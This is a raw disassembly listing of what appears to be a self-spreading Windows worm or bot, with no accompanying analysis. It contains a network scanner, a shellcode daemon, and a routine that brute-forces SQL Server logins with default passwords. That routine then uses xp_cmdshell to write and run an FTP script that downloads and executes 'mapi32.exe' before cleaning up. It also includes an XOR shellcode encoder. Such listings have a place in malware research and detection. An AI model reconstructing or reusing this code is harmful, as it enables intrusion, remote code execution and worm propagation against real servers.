mov esi, 326h
lea eax, [ebp-610h]
sub esi, edi
push edi
push eax
lea eax, [ebp+esi-410h]
push eax
call sub_40AC2E
add esp, 24h
add esi, edi
lea eax, [ebp-410h]
push 0
push esi
push eax
push dword ptr [ebp+8]
call dword_401244
cmp eax, 0FFFFFFFFh
jnz short loc_406DB1
push 0
call dword_4010EC ; ExitThread
loc_406DB1: ; CODE XREF: MEW:00406DA7�j
push dword ptr [ebp+8]
call sub_408616
pop ecx
push 1
call dword_4010EC ; ExitThread
push ebp
mov ebp, esp
sub esp, 610h
push ebx
push esi
mov esi, [ebp+8]
push edi
push 6
push offset aR_0 ; "/\\r\n:"
mov eax, [esi+4]
imul eax, 2Ch
push dword_402BEC[eax]
mov ax, word_40B24A
push eax
lea eax, [ebp-210h]
push dword_40B244
push 200h
push eax
call sub_407617
mov ebx, eax
xor edi, edi
add esp, 1Ch
cmp ebx, edi
jnz short loc_406E14
push edi
call dword_4010EC ; ExitThread
loc_406E14: ; CODE XREF: MEW:00406E0B�j
push 10h
lea eax, [ebp-10h]
push edi
push eax
call sub_40AC10
add esp, 0Ch
mov word ptr [ebp-10h], 2
push 59Ah
call dword_401230
mov [ebp-0Eh], ax
mov eax, [esi+8]
push edi
push 2
push 2
mov [ebp-0Ch], eax
call dword_401234
mov esi, eax
lea eax, [ebp-10h]
push 10h
push eax
push esi
call dword_401238
cmp eax, 0FFFFFFFFh
push edi
jnz short loc_406E64
call dword_4010EC ; ExitThread
loc_406E64: ; CODE XREF: MEW:00406E5C�j
lea eax, [ebp-610h]
push offset loc_402A14
push eax
call sub_40AC2E
lea eax, [ebp-210h]
push ebx
push eax
lea eax, [ebp-610h]
push eax
call sub_40AC2E
add esp, 18h
add ebx, 75h
lea eax, [ebp-610h]
push edi
push ebx
push eax
push esi
call dword_401244
cmp eax, 0FFFFFFFFh
jnz short loc_406EAB
push edi
call dword_4010EC ; ExitThread
loc_406EAB: ; CODE XREF: MEW:00406EA2�j
push esi
call sub_408616
pop ecx
push 1
call dword_4010EC ; ExitThread
push ebp
mov ebp, esp
sub esp, 0C3Ch
mov al, byte_40B078
push ebx
push esi
mov [ebp-1], al
push edi
lea eax, [ebp-10h]
xor edi, edi
push eax
mov esi, offset aSa ; "sa"
push edi
push 1
mov [ebp-34h], esi
mov dword ptr [ebp-30h], offset aRoot ; "root"
mov dword ptr [ebp-2Ch], offset aAdmin ; "admin"
mov dword ptr [ebp-28h], offset byte_40B078
mov [ebp-24h], edi
call sub_40AB88
test ax, ax
jz short loc_406F08
push edi
call dword_4010EC ; ExitThread
loc_406F08: ; CODE XREF: MEW:00406EFF�j
push 0FFFFFFFAh
push 3
push 0C8h
push dword ptr [ebp-10h]
call sub_40AB82
test ax, ax
jz short loc_406F25
push edi
call dword_4010EC ; ExitThread
loc_406F25: ; CODE XREF: MEW:00406F1C�j
lea eax, [ebp-0Ch]
push eax
push dword ptr [ebp-10h]
push 2
call sub_40AB88
test ax, ax
jz short loc_406F3F
push edi
call dword_4010EC ; ExitThread
loc_406F3F: ; CODE XREF: MEW:00406F36�j
mov eax, esi
test eax, eax
jz loc_4070A8
mov edi, [ebp+8]
lea ebx, [ebp-34h]
mov esi, offset aMapi32_exe ; "mapi32.exe"
loc_406F54: ; CODE XREF: MEW:004070A0�j
lea ecx, [ebp-1]
push ecx
push eax
push dword ptr [edi+8]
call sub_40715A
pop ecx
push eax
lea eax, [ebp-838h]
push offset aDriverSqlServe ; "DRIVER={SQL Server};SERVER=%s;UID=sa;PW"...
push eax
call sub_40AB94
add esp, 14h
lea eax, [ebp-1Eh]
push 3
push eax
lea eax, [ebp-0C3Ch]
push 400h
push eax
lea eax, [ebp-838h]
push eax
call sub_40ABD2
pop ecx
push eax
lea eax, [ebp-838h]
push eax
push 0
push dword ptr [ebp-0Ch]
call sub_40AB7C
lea eax, [ebp-8]
push eax
push dword ptr [ebp-0Ch]
call sub_40AB76
push 6
push 1
call sub_40A818
push eax
call sub_40A77F
add esp, 0Ch
push eax
lea eax, [ebp-1Ch]
push offset aS_txt ; "%s.txt"
push eax
call sub_40AB94
add esp, 0Ch
lea eax, [ebp-1Ch]
push eax
lea eax, [ebp-1Ch]
push eax
lea eax, [ebp-1Ch]
push eax
lea eax, [ebp-1Ch]
push esi
push eax
push 0Ah
push 4
call sub_40A818
push eax
call sub_40A77F
add esp, 0Ch
push eax
push 0Ah
push 4
call sub_40A818
push eax
call sub_40A77F
add esp, 0Ch
push eax
lea eax, [ebp-1Ch]
push eax
movzx eax, word_40B0D0
push eax
push dword_40B244
call sub_40715A
pop ecx
push eax
lea eax, [ebp-434h]
push offset aExecMaster__xp ; "EXEC master..xp_cmdshell 'echo open %s "...
push eax
call sub_40AB94
add esp, 30h
push 0FFFFFFFDh
lea eax, [ebp-434h]
push eax
push dword ptr [ebp-8]
call sub_40AB70
test ax, ax
jnz short loc_407098
push dword ptr [ebp-8]
push 3
call sub_40AB6A
lea eax, [ebp-8]
push eax
push dword ptr [ebp-0Ch]
call sub_40AB76
push esi
lea eax, [ebp-1Ch]
push esi
push eax
lea eax, [ebp-434h]
push offset aExecMaster___0 ; "EXEC master..xp_cmdshell 'del %s &%s &c"...
push eax
loc_40707A: ; DATA XREF: MEW:00402804�o
; MEW:00402818�o ...
call sub_40AB94
add esp, 14h
lea eax, [ebp-434h]
push 0FFFFFFFDh
push eax
push dword ptr [ebp-8]
call sub_40AB70
test ax, ax
jz short loc_4070D0
loc_407098: ; CODE XREF: MEW:00407050�j
mov eax, [ebx+4]
add ebx, 4
test eax, eax
jnz loc_406F54
xor edi, edi
loc_4070A8: ; CODE XREF: MEW:00406F43�j
lea eax, [ebp-0Ch]
push eax
push 2
call sub_40AB6A
lea eax, [ebp-10h]
push eax
push 1
call sub_40AB6A
lea eax, [ebp-8]
push eax
push 3
call sub_40AB6A
push edi
call dword_4010EC ; ExitThread
loc_4070D0: ; CODE XREF: MEW:00407096�j
mov eax, [edi+4]
imul eax, 2Ch
inc dword_402BE8[eax]
lea eax, dword_402BE8[eax]
lea eax, [ebp-0Ch]
push eax
push 2
call sub_40AB6A
lea eax, [ebp-10h]
push eax
push 1
call sub_40AB6A
lea eax, [ebp-8]
push eax
push 3
call sub_40AB6A
push 1
call dword_4010EC ; ExitThread
; =============== S U B R O U T I N E =======================================
sub_40710B proc near ; CODE XREF: sub_407282+255�p
push dword_40B0C8
call dword_401254
inc eax
push eax
call dword_4011F4
mov dword_40B0C8, eax
retn
sub_40710B endp
; =============== S U B R O U T I N E =======================================
sub_407125 proc near ; CODE XREF: sub_404530+6CF�p
push esi
call dword_4010FC ; GetTickCount
push eax
call sub_40AC3A
pop ecx
call sub_40AC34
mov esi, eax
shl esi, 8
call sub_40AC34
add esi, eax
shl esi, 8
call sub_40AC34
add esi, eax
shl esi, 8
call sub_40AC34
add eax, esi
pop esi
retn
sub_407125 endp
; =============== S U B R O U T I N E =======================================
sub_40715A proc near ; CODE XREF: sub_404530+119�p
; sub_404530+16C�p ...
arg_0 = dword ptr 4
push [esp+arg_0]
call dword_401220
retn
sub_40715A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407165 proc near ; CODE XREF: sub_407207+55�p
; sub_4096C8+2B�p
var_124 = dword ptr -124h
var_120 = dword ptr -120h
var_20 = word ptr -20h
var_1E = word ptr -1Eh
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 124h
push ebx
push esi
push edi
and [ebp+var_1], 0
push 1
xor edi, edi
pop ebx
push edi
push ebx
push 2
mov [ebp+var_8], ebx
call dword_401234
push [ebp+arg_4]
mov esi, eax
mov eax, [ebp+arg_0]
mov [ebp+var_20], 2
mov [ebp+var_1C], eax
call dword_401230
mov [ebp+var_1E], ax
lea eax, [ebp+var_8]
push eax
push 8004667Eh
push esi
call dword_40125C
cmp eax, 0FFFFFFFFh
jnz short loc_4071BB
xor al, al
jmp short loc_407202
; ---------------------------------------------------------------------------
loc_4071BB: ; CODE XREF: sub_407165+50�j
lea eax, [ebp+var_20]
push 10h
push eax
push esi
call dword_401238
mov eax, [ebp+arg_8]
mov [ebp+var_C], edi
mov [ebp+var_10], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_124]
push edi
push eax
push edi
push edi
mov [ebp+var_120], esi
mov [ebp+var_124], ebx
call dword_4011F0
cmp eax, ebx
jl short loc_4071F8
mov [ebp+var_1], bl
loc_4071F8: ; CODE XREF: sub_407165+8E�j
push esi
call dword_401240
mov al, [ebp+var_1]
loc_407202: ; CODE XREF: sub_407165+54�j
pop edi
pop esi
pop ebx
leave
retn
sub_407165 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407207 proc near ; DATA XREF: sub_407282+105�o
var_18 = dword ptr -18h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_404428
push offset loc_40ABC0
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
push ebx
push esi
push edi
mov [ebp+var_18], esp
and [ebp+var_4], 0
mov esi, [ebp+arg_0]
loc_407233: ; CODE XREF: sub_407207+66�j
cmp byte_40B248, 0
jz short loc_407276
loc_40723C: ; CODE XREF: sub_407207+42�j
cmp dword ptr [esi], 1
jz short loc_40724B
push 32h
call dword_4010F4 ; Sleep
jmp short loc_40723C
; ---------------------------------------------------------------------------
loc_40724B: ; CODE XREF: sub_407207+38�j
mov dword ptr [esi], 2
push dword ptr [esi+0Ch]
mov ax, [esi+8]
push eax
push dword ptr [esi+4]
call sub_407165
add esp, 0Ch
neg al
sbb eax, eax
add eax, 4
mov [esi], eax
jmp short loc_407233
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
loc_407276: ; CODE XREF: sub_407207+33�j
or [ebp+var_4], 0FFFFFFFFh
push 0
call dword_4010EC ; ExitThread
sub_407207 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407282 proc near ; DATA XREF: sub_404530+7AE�o
var_36 = byte ptr -36h
var_35 = byte ptr -35h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = word ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_404438
push offset loc_40ABC0
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 28h
push ebx
push esi
push edi
mov [ebp+var_18], esp
mov esi, [ebp+arg_0]
cmp byte ptr [esi+1Ch], 0
mov eax, offset aEnabled ; "enabled"
jnz short loc_4072BB
mov eax, offset aDisabled ; "disabled"
loc_4072BB: ; CODE XREF: sub_407282+32�j
push eax
push dword ptr [esi+10h]
push dword ptr [esi+0Ch]
push dword ptr [esi+14h]
movzx eax, word ptr [esi+4]
push eax
push dword ptr [esi]
call sub_40715A
pop ecx
push eax
mov eax, dword_40372C
imul eax, 1Ch
push off_401BB0[eax]
push offset dword_402EA8
call sub_405185
add esp, 20h
push 3E8h
call dword_4010F4 ; Sleep
mov ebx, offset dword_40B080
push ebx
call dword_4010D8 ; RtlDeleteCriticalSection
push 80000400h
push ebx
call dword_4010DC ; InitializeCriticalSectionAndSpinCount
test eax, eax
jnz short loc_40732F
push offset aScanner ; "Scanner"
call sub_40A64F
push eax
call sub_40A56C
pop ecx
pop ecx
push 0
call dword_4010EC ; ExitThread
loc_40732F: ; CODE XREF: sub_407282+91�j
mov byte_40B248, 1
mov eax, [esi]
mov dword_40B0C8, eax
mov eax, [esi+14h]
lea eax, [eax+eax*4]
shl eax, 2
push eax
call sub_40AC22
pop ecx
mov edi, eax
mov [ebp+var_28], edi
push ebx
call dword_4010E0 ; RtlEnterCriticalSection
xor ebx, ebx
mov [ebp+var_4], ebx
mov [ebp+var_2C], ebx
loc_407361: ; CODE XREF: sub_407282+11C�j
cmp ebx, [esi+14h]
jge short loc_4073A0
lea eax, [ebx+ebx*4]
lea edi, [edi+eax*4]
mov eax, [esi]
mov [edi+4], eax
and dword ptr [edi], 0
mov ax, [esi+4]
mov [edi+8], ax
mov eax, [esi+0Ch]
mov [edi+0Ch], eax
push 0
push 1
push edi
push offset sub_407207
call sub_40A45C
add esp, 10h
mov [edi+10h], eax
inc ebx
mov [ebp+var_2C], ebx
mov edi, [ebp+var_28]
jmp short loc_407361
; ---------------------------------------------------------------------------
loc_4073A0: ; CODE XREF: sub_407282+E2�j
; sub_407282+26C�j
cmp byte_40B248, 0
jz loc_4074F3
xor edi, edi
loc_4073AF: ; CODE XREF: sub_407282+264�j
mov [ebp+var_2C], edi
cmp edi, [esi+14h]
jge loc_4074EB
push 14h
call dword_4010F4 ; Sleep
lea eax, [edi+edi*4]
mov ebx, [ebp+var_28]
lea ecx, [ebx+eax*4]
mov eax, [ecx]
test eax, eax
jz loc_4074D1
cmp eax, 4
jz loc_4074D1
cmp eax, 1
jz loc_4074E5
cmp eax, 2
jz loc_4074E5
cmp eax, 3
jnz loc_4074D1
mov edx, [esi+8]
test edx, edx
jz loc_4074D1
mov al, [esi+1Ch]
mov [ebp+var_35], al
test al, al
jnz short loc_407449
mov eax, edx
imul eax, 2Ch
cmp byte_402BF0[eax], 0
jz short loc_407449
mov [ebp+var_20], edx
mov ecx, [ecx+4]
mov [ebp+var_1C], ecx
mov cx, [esi+4]
mov [ebp+var_24], cx
push 0
push 1
lea ecx, [ebp+var_24]
push ecx
push off_402BE4[eax]
call sub_40A45C
add esp, 10h
jmp loc_4074D1
; ---------------------------------------------------------------------------
loc_407449: ; CODE XREF: sub_407282+18B�j
; sub_407282+199�j
cmp [ebp+var_35], 0
jz short loc_4074A6
and [ebp+var_30], 0
loc_407453: ; CODE XREF: sub_407282+222�j
mov eax, [ebp+var_30]
imul eax, 2Ch
mov dx, word ptr dword_402BE0[eax]
test dx, dx
jz short loc_4074D1
cmp byte_402BF0[eax], 0
jz short loc_4074A1
mov cx, [esi+4]
cmp dx, cx
jnz short loc_4074A1
mov edx, [ebp+var_30]
mov [ebp+var_20], edx
lea edx, [edi+edi*4]
mov edx, [ebx+edx*4+4]
mov [ebp+var_1C], edx
mov [ebp+var_24], cx
push 0
push 1
lea ecx, [ebp+var_24]
push ecx
push off_402BE4[eax]
call sub_40A45C
add esp, 10h
loc_4074A1: ; CODE XREF: sub_407282+1EA�j
; sub_407282+1F3�j
inc [ebp+var_30]
jmp short loc_407453
; ---------------------------------------------------------------------------
loc_4074A6: ; CODE XREF: sub_407282+1CB�j
push edi
movzx eax, word ptr [esi+4]
push eax
push dword ptr [ecx+4]
call sub_40715A
pop ecx
push eax
mov eax, dword_40372C
imul eax, 1Ch
push off_401BB0[eax]
push offset dword_402E5C
call sub_405185
add esp, 14h
loc_4074D1: ; CODE XREF: sub_407282+14E�j
; sub_407282+157�j ...
lea eax, [edi+edi*4]
lea ebx, [ebx+eax*4]
call sub_40710B
mov [ebx+4], eax
mov dword ptr [ebx], 1
loc_4074E5: ; CODE XREF: sub_407282+160�j
; sub_407282+169�j
inc edi
jmp loc_4073AF
; ---------------------------------------------------------------------------
loc_4074EB: ; CODE XREF: sub_407282+133�j
mov edi, [ebp+var_28]
jmp loc_4073A0
; ---------------------------------------------------------------------------
loc_4074F3: ; CODE XREF: sub_407282+125�j
push 2710h
call dword_4010F4 ; Sleep
xor ebx, ebx
loc_407500: ; CODE XREF: sub_407282+296�j
mov [ebp+var_2C], ebx
cmp ebx, [esi+14h]
jge short loc_40751A
push 0
lea eax, [ebx+ebx*4]
push dword ptr [edi+eax*4+10h]
call dword_4010E4 ; TerminateThread
inc ebx
jmp short loc_407500
; ---------------------------------------------------------------------------
loc_40751A: ; CODE XREF: sub_407282+284�j
mov [ebp+var_34], edi
push edi
call sub_40AC40
pop ecx
jmp short loc_40752D
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
loc_40752D: ; CODE XREF: sub_407282+2A2�j
or [ebp+var_4], 0FFFFFFFFh
push offset dword_40B080
call dword_4010E8 ; RtlLeaveCriticalSection
push offset aScanner ; "Scanner"
call sub_40A64F
push eax
call sub_40A56C
pop ecx
pop ecx
push 0
call dword_4010EC ; ExitThread
sub_407282 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407556 proc near ; CODE XREF: sub_407617+59�p
; sub_407617+7B�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = byte ptr 18h
push ebp
mov ebp, esp
xor edx, edx
push esi
cmp [ebp+arg_4], edx
jbe short loc_407585
loc_407561: ; CODE XREF: sub_407556+2D�j
xor ecx, ecx
cmp [ebp+arg_C], ecx
jbe short loc_40757F
mov eax, [ebp+arg_0]
mov al, [edx+eax]
xor al, [ebp+arg_10]
loc_407571: ; CODE XREF: sub_407556+27�j
mov esi, [ebp+arg_8]
cmp al, [ecx+esi]
jz short loc_40758A
inc ecx
cmp ecx, [ebp+arg_C]
jb short loc_407571
loc_40757F: ; CODE XREF: sub_407556+10�j
inc edx
cmp edx, [ebp+arg_4]
jb short loc_407561
loc_407585: ; CODE XREF: sub_407556+9�j
xor al, al
loc_407587: ; CODE XREF: sub_407556+36�j
pop esi
pop ebp
retn
; ---------------------------------------------------------------------------
loc_40758A: ; CODE XREF: sub_407556+21�j
mov al, 1
jmp short loc_407587
sub_407556 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40758E proc near ; CODE XREF: sub_407617+3B�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push edi
mov edi, 153h
cmp [ebp+arg_4], edi
jnb short loc_4075A0
xor eax, eax
jmp short loc_407614
; ---------------------------------------------------------------------------
loc_4075A0: ; CODE XREF: sub_40758E+C�j
push esi
call dword_4010FC ; GetTickCount
push eax
call sub_40AC3A
mov esi, [ebp+arg_0]
push edi
push offset dword_402F5C
push esi
call sub_40AC2E
mov eax, [ebp+arg_8]
add esp, 10h
mov [esi+0D3h], eax
push [ebp+arg_C]
call dword_401230
mov [esi+0DAh], ax
mov eax, [ebp+arg_10]
push 7Ah
push 61h
mov [esi+0F6h], eax
call sub_40A818
push 7Ah
push 61h
mov [esi+111h], al
call sub_40A818
push 7Ah
push 61h
mov [esi+112h], al
call sub_40A818
add esp, 18h
mov [esi+113h], al
mov eax, edi
pop esi
loc_407614: ; CODE XREF: sub_40758E+10�j
pop edi
pop ebp
retn
sub_40758E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407617 proc near ; CODE XREF: sub_405DB7+61�p
; sub_405DB7+32C�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
push ecx
push ecx
cmp [ebp+arg_4], 16Fh
jnb short loc_407629
xor eax, eax
leave
retn
; ---------------------------------------------------------------------------
loc_407629: ; CODE XREF: sub_407617+C�j
push ebx
push esi
push edi
mov edi, [ebp+arg_0]
push 1Ch
push offset loc_402F3C
lea ebx, [edi+1Ch]
push edi
mov [ebp+var_4], ebx
call sub_40AC2E
push [ebp+arg_10]
mov esi, 153h
push [ebp+arg_C]
push [ebp+arg_8]
push esi
push ebx
call sub_40758E
mov eax, dword_402F38
add esp, 20h
mov [ebp+arg_4], eax
loc_407662: ; CODE XREF: sub_407617+94�j
push 0
lea eax, [ebp+arg_4]
push [ebp+arg_18]
push [ebp+arg_14]
push 4
push eax
call sub_407556
add esp, 14h
test al, al
jnz short loc_40769E
mov eax, [ebp+arg_4]
push 0
push [ebp+arg_18]
xor eax, esi
mov [ebp+var_8], eax
lea eax, [ebp+var_8]
push [ebp+arg_14]
push 4
push eax
call sub_407556
add esp, 14h
test al, al
jz short loc_4076AD
loc_40769E: ; CODE XREF: sub_407617+63�j
call sub_40A856
mov [ebp+arg_4], eax
mov dword_402F38, eax
jmp short loc_407662
; ---------------------------------------------------------------------------
loc_4076AD: ; CODE XREF: sub_407617+85�j
mov eax, [ebp+arg_4]
mov [edi+3], eax
mov eax, [ebp+var_8]
mov [edi+9], eax
mov bl, byte_402F34
mov byte ptr [ebp+arg_0], bl
loc_4076C2: ; CODE XREF: sub_407617+D4�j
push [ebp+arg_0]
push [ebp+arg_18]
push [ebp+arg_14]
push esi
push [ebp+var_4]
call sub_407556
add esp, 14h
test al, al
jz short loc_4076ED
call sub_40A86A
mov bl, al
mov byte ptr [ebp+arg_0], bl
mov byte_402F34, bl
jmp short loc_4076C2
; ---------------------------------------------------------------------------
loc_4076ED: ; CODE XREF: sub_407617+C2�j
mov [edi+12h], bl
xor eax, eax
loc_4076F2: ; CODE XREF: sub_407617+E5�j
mov ecx, [ebp+var_4]
add ecx, eax
xor [ecx], bl
inc eax
cmp eax, esi
jb short loc_4076F2
pop edi
pop esi
mov eax, 16Fh
pop ebx
leave
retn
sub_407617 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407708 proc near ; DATA XREF: sub_40785E+B3�o
var_270 = byte ptr -270h
var_70 = byte ptr -70h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 270h
push ebx
xor ebx, ebx
push edi
mov edi, [ebp+arg_0]
push ebx
lea eax, [ebp+var_C]
push 4
push eax
push edi
call dword_40123C
cmp eax, 4
jz short loc_407732
push ebx
call dword_4010EC ; ExitThread
loc_407732: ; CODE XREF: sub_407708+21�j
cmp word ptr dword_402BE0, bx
mov [ebp+var_4], ebx
jz short loc_407756
mov eax, offset dword_402BE0
loc_407743: ; CODE XREF: sub_407708+4C�j
mov ecx, [eax+0Ch]
cmp ecx, [ebp+var_C]
jz short loc_407764
inc [ebp+var_4]
add eax, 2Ch
cmp [eax], bx
jnz short loc_407743
loc_407756: ; CODE XREF: sub_407708+34�j
push edi
call sub_408616
pop ecx
push ebx
call dword_4010EC ; ExitThread
loc_407764: ; CODE XREF: sub_407708+41�j
lea eax, [ebp+var_70]
push eax
push edi
call sub_40854A
pop ecx
test al, al
pop ecx
jnz short loc_407784
lea eax, [ebp+var_70]
push offset aUnknown ; "unknown"
push eax
call sub_40ABA0
pop ecx
pop ecx
loc_407784: ; CODE XREF: sub_407708+6A�j
push offset dword_4030FC
push offset aMapi32_exe ; "mapi32.exe"
call sub_40AC52
pop ecx
cmp eax, ebx
pop ecx
mov [ebp+var_8], eax
jnz short loc_4077AB
push edi
call sub_408616
pop ecx
pop edi
xor eax, eax
pop ebx
leave
retn 4
; ---------------------------------------------------------------------------
loc_4077AB: ; CODE XREF: sub_407708+92�j
push esi
mov esi, 200h
push eax
push esi
lea eax, [ebp+var_270]
push 1
push eax
call sub_40AC4C
add esp, 10h
push ebx
push eax
lea eax, [ebp+var_270]
push eax
push edi
mov edi, dword_401244
loc_4077D4: ; CODE XREF: sub_407708+F8�j
call edi ; dword_401244
cmp eax, ebx
jz short loc_407802
cmp eax, 0FFFFFFFFh
jz short loc_407802
push [ebp+var_8]
lea eax, [ebp+var_270]
push esi
push 1
push eax
call sub_40AC4C
add esp, 10h
push ebx
push eax
lea eax, [ebp+var_270]
push eax
push [ebp+arg_0]
jmp short loc_4077D4
; ---------------------------------------------------------------------------
loc_407802: ; CODE XREF: sub_407708+D0�j
; sub_407708+D5�j
mov esi, [ebp+var_4]
lea eax, [ebp+var_70]
imul esi, 2Ch
inc dword_402BE8[esi]
push eax
lea edi, dword_402BE8[esi]
lea eax, [ebp+var_70]
push eax
call sub_409570
pop ecx
push eax
mov eax, dword_40372C
push dword ptr [edi]
imul eax, 1Ch
push off_402BDC[esi]
push off_401BB0[eax]
push offset dword_4030B0
call sub_405185
push [ebp+arg_0]
call sub_408616
push [ebp+var_8]
call sub_40AC46
add esp, 20h
push ebx
call dword_4010EC ; ExitThread
pop esi
sub_407708 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40785E proc near ; DATA XREF: sub_40933F+171�o
var_4940 = byte ptr -4940h
var_491C = byte ptr -491Ch
var_471C = byte ptr -471Ch
var_4718 = byte ptr -4718h
var_2718 = byte ptr -2718h
var_2618 = byte ptr -2618h
var_1848 = byte ptr -1848h
var_1844 = byte ptr -1844h
var_1840 = byte ptr -1840h
var_146C = byte ptr -146Ch
var_1468 = byte ptr -1468h
var_1464 = byte ptr -1464h
var_618 = byte ptr -618h
var_418 = byte ptr -418h
var_218 = byte ptr -218h
var_216 = byte ptr -216h
var_215 = byte ptr -215h
var_18 = word ptr -18h
var_16 = word ptr -16h
var_14 = dword ptr -14h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 14h
push ebx
push esi
push edi
push 6
push 1
push 2
call dword_401234
mov esi, offset aShellcodedaemo ; "ShellcodeDaemon"
mov edi, eax
push esi
call sub_40A64F
lea eax, [eax+eax*2]
pop ecx
xor ebx, ebx
mov dword_40B0E0[eax*8], edi
mov eax, [ebp+arg_0]
push ebx
movzx eax, word ptr [eax]
push eax
push esi
call sub_40A64F
lea eax, [eax+eax*2]
pop ecx
push dword_40B0E0[eax*8]
call sub_4085A6
add esp, 0Ch
test al, al
jnz short loc_4078C7
push esi
call sub_40A64F
push eax
call sub_40A56C
pop ecx
pop ecx
push ebx
call dword_4010EC ; ExitThread
loc_4078C7: ; CODE XREF: sub_40785E+52�j
; sub_40785E+E2�j ...
lea eax, [ebp+var_14]
push ebx
push eax
push esi
call sub_40A64F
lea eax, [eax+eax*2]
pop ecx
push dword_40B0E0[eax*8]
call dword_4011F8
push esi
mov edi, eax
call sub_40A64F
lea eax, [eax+eax*2]
cmp edi, 0FFFFFFFFh
pop ecx
mov dword_40B0E4[eax*8], edi
jz short loc_40791E
lea eax, [ebp+var_4]
push eax
push ebx
push esi
call sub_40A64F
lea eax, [eax+eax*2]
pop ecx
push dword_40B0E4[eax*8]
push offset sub_407708
push ebx
push ebx
call dword_4010D4 ; CreateThread
loc_40791E: ; CODE XREF: sub_40785E+9B�j
push esi
call sub_40A64F
lea eax, [eax+eax*2]
pop ecx
push esi
cmp dword_40B0E0[eax*8], 0FFFFFFFFh
jnz short loc_407942
call sub_40A64F
push eax
call sub_40A56C
pop ecx
pop ecx
jmp short loc_4078C7
; ---------------------------------------------------------------------------
loc_407942: ; CODE XREF: sub_40785E+D3�j
call sub_40A64F
lea eax, [eax+eax*2]
pop ecx
cmp dword_40B0E0[eax*8], ebx
jnz loc_4078C7
push esi
call sub_40A64F
lea eax, [eax+eax*2]
push dword_40B0E0[eax*8]
call sub_408616
push esi
call sub_40A64F
push eax
call sub_40A56C
add esp, 10h
push ebx
call dword_4010EC ; ExitThread
push ebp
mov ebp, esp
mov eax, 4940h
call sub_40ABE0
push ebx
push esi
push edi
mov edi, [ebp+arg_0]
push 7
push offset dword_402260
mov eax, [edi+4]
mov esi, 200h
imul eax, 2Ch
push dword_402BEC[eax]
mov ax, word_40B24A
push eax
lea eax, [ebp+var_618]
push dword_40B244
push esi
push eax
call sub_407617
xor ebx, ebx
add esp, 1Ch
cmp eax, ebx
mov [ebp+var_8], eax
jnz short loc_4079DB
push ebx
call dword_4010EC ; ExitThread
loc_4079DB: ; CODE XREF: sub_40785E+174�j
push 10h
lea eax, [ebp+var_18]
push ebx
push eax
call sub_40AC10
mov eax, [edi+8]
add esp, 0Ch
mov [ebp+var_14], eax
mov ax, [edi]
push eax
mov [ebp+var_18], 2
call dword_401230
push ebx
push ebx
push ebx
push 6
push 1
push 2
mov [ebp+var_16], ax
call dword_401200
lea ecx, [ebp+var_18]
push 10h
push ecx
push eax
mov [ebp+arg_0], eax
call dword_401238
cmp eax, 0FFFFFFFFh
push ebx
jnz short loc_407A2F
call dword_4010EC ; ExitThread
loc_407A2F: ; CODE XREF: sub_40785E+1C9�j
mov edi, dword_40123C
lea eax, [ebp+var_218]
push 4
push eax
push [ebp+arg_0]
call edi ; dword_40123C
lea eax, [ebp+var_215]
push 1
push eax
lea eax, [ebp+var_4]
push eax
call sub_40AC2E
lea eax, [ebp+var_216]
push 1
push eax
lea eax, [ebp+0]
push eax
call sub_40AC2E
add esp, 18h
lea eax, [ebp+var_218]
push ebx
push [ebp+var_4]
push eax
push [ebp+arg_0]
call edi ; dword_40123C
push esi
lea eax, [ebp+var_418]
push 58h
push eax
call sub_40AC10
mov ebx, 2000h
lea eax, [ebp+var_2618]
push ebx
push 90h
push eax
call sub_40AC10
lea eax, [ebp+var_618]
push 1FFh
push eax
lea eax, [ebp+var_1848]
sub eax, [ebp+var_8]
push eax
call sub_40AC2E
mov edi, offset loc_4023A4
push 2
lea eax, [ebp+var_1848]
push edi
push eax
call sub_40AC2E
push 4
lea eax, [ebp+var_1844]
push offset dword_403168
push eax
call sub_40AC2E
push 5
lea eax, [ebp+var_1840]
push offset dword_403160
push eax
call sub_40AC2E
add esp, 48h
lea eax, [ebp+var_146C]
push 2
push edi
push eax
call sub_40AC2E
push 4
lea eax, [ebp+var_1468]
push offset dword_403158
push eax
